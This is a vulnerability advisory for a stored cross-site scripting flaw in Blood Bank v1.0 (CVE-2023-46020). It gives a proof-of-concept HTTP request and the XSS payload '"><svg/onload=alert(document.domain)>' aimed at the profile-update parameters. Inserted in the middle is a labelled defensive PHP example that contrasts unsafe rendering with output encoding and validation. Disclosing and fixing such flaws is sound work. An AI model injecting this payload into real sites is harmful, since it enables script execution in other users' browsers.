# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46020

-------------------------------------------------------------------------------

# Description:

The parameters rname, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank v1.0 are susceptible to Stored Cross-Site Scripting (XSS). The vulnerability arises from insufficient validation and sanitization of user-supplied data: the values are written to the database as submitted and later echoed into the profile page without output encoding. An attacker can inject script into these parameters; once stored on the server, it may execute in the browser of any user who views the affected user's profile.

Vulnerable File: updateprofile.php

Parameters: rname, remail, rphone, rcity
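The defensive side of the issue above, as an added example that is not part of this advisory or of the Blood Bank project's code: a minimal PHP model of a profile page that stores the posted fields and later renders them, first in the unsafe pattern the description outlines and then with output encoding applied. The field names (rname, remail, rphone, rcity) and the sample input come from the advisory's request; the in-memory storage array, the function names and the HTML layout are assumptions standing in for the application's database and templates.

```php
<?php
// Added example, not the Blood Bank project's own code. Field names follow the
// advisory's request; the $store array stands in for the application's database.
declare(strict_types=1);

// Stand-in for the row updateprofile.php writes: values are stored as submitted.
function storeProfile(array &$store, array $post): void
{
    foreach (['rname', 'remail', 'rphone', 'rcity'] as $field) {
        $store[$field] = (string)($post[$field] ?? '');
    }
}

// Unsafe rendering: untrusted values are concatenated straight into markup.
// The payload's leading "> closes the value attribute and injects a new element.
function renderProfileUnsafe(array $store): string
{
    return '<input type="text" name="rname" value="' . $store['rname'] . '">'
         . '<p>' . $store['rcity'] . '</p>';
}

// Output encoding: ENT_QUOTES encodes both " and ', which is what makes the
// attribute context safe; the charset must match the page's declared encoding.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened rendering: every untrusted value passes through h() at output time.
function renderProfileSafe(array $store): string
{
    return '<input type="text" name="rname" value="' . h($store['rname']) . '">'
         . '<p>' . h($store['rcity']) . '</p>';
}

// Defence in depth: reject values that cannot be legitimate for the field,
// so the database never holds markup in a phone or e-mail column.
function validateProfile(array $post): array
{
    $errors = [];
    if (!filter_var($post['remail'] ?? '', FILTER_VALIDATE_EMAIL)) {
        $errors[] = 'remail must be a valid e-mail address';
    }
    if (!preg_match('/^\+?[0-9]{6,15}$/', $post['rphone'] ?? '')) {
        $errors[] = 'rphone must be 6 to 15 digits';
    }
    foreach (['rname', 'rcity'] as $field) {
        if (strlen($post[$field] ?? '') > 100) {
            $errors[] = "$field exceeds 100 characters";
        }
    }
    return $errors;
}

// Constructed input reproducing the advisory's request body.
$post = [
    'rname'  => 'test"><svg/onload=alert(document.domain)>',
    'remail' => 'test@gmail.com',
    'rphone' => '8875643456',
    'rcity'  => 'lucknow',
];

$profile = [];
storeProfile($profile, $post);

$unsafe = renderProfileUnsafe($profile);
$safe   = renderProfileSafe($profile);

// The unsafe output contains a live <svg> element; the encoded output does not.
printf("unsafe contains <svg: %s\n", str_contains($unsafe, '<svg/onload=') ? 'yes' : 'no');
printf("safe contains <svg:   %s\n", str_contains($safe, '<svg/onload=') ? 'yes' : 'no');
echo $safe, PHP_EOL;
printf("validation errors: %s\n", implode('; ', validateProfile($post)) ?: 'none');
```

Run it with `php example.php`. Encoding at the point of output is the fix that closes this class of bug regardless of what reached the database; the validation step only narrows what can be stored and is not a substitute, since rname and rcity legitimately accept free text. A Content-Security-Policy without `unsafe-inline` would additionally stop the inline `onload` handler from running even if encoding were missed somewhere.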
# Proof of Concept:
----------------------

1. Intercept the POST request to updateprofile.php via Burp Suite
2. Inject the payload into the vulnerable parameters
3. Payload: "><svg/onload=alert(document.domain)>
4. Example request for the rname parameter:

---

POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update

----

5. Go to the profile page and trigger the XSS

XSS Payload:

"><svg/onload=alert(document.domain)>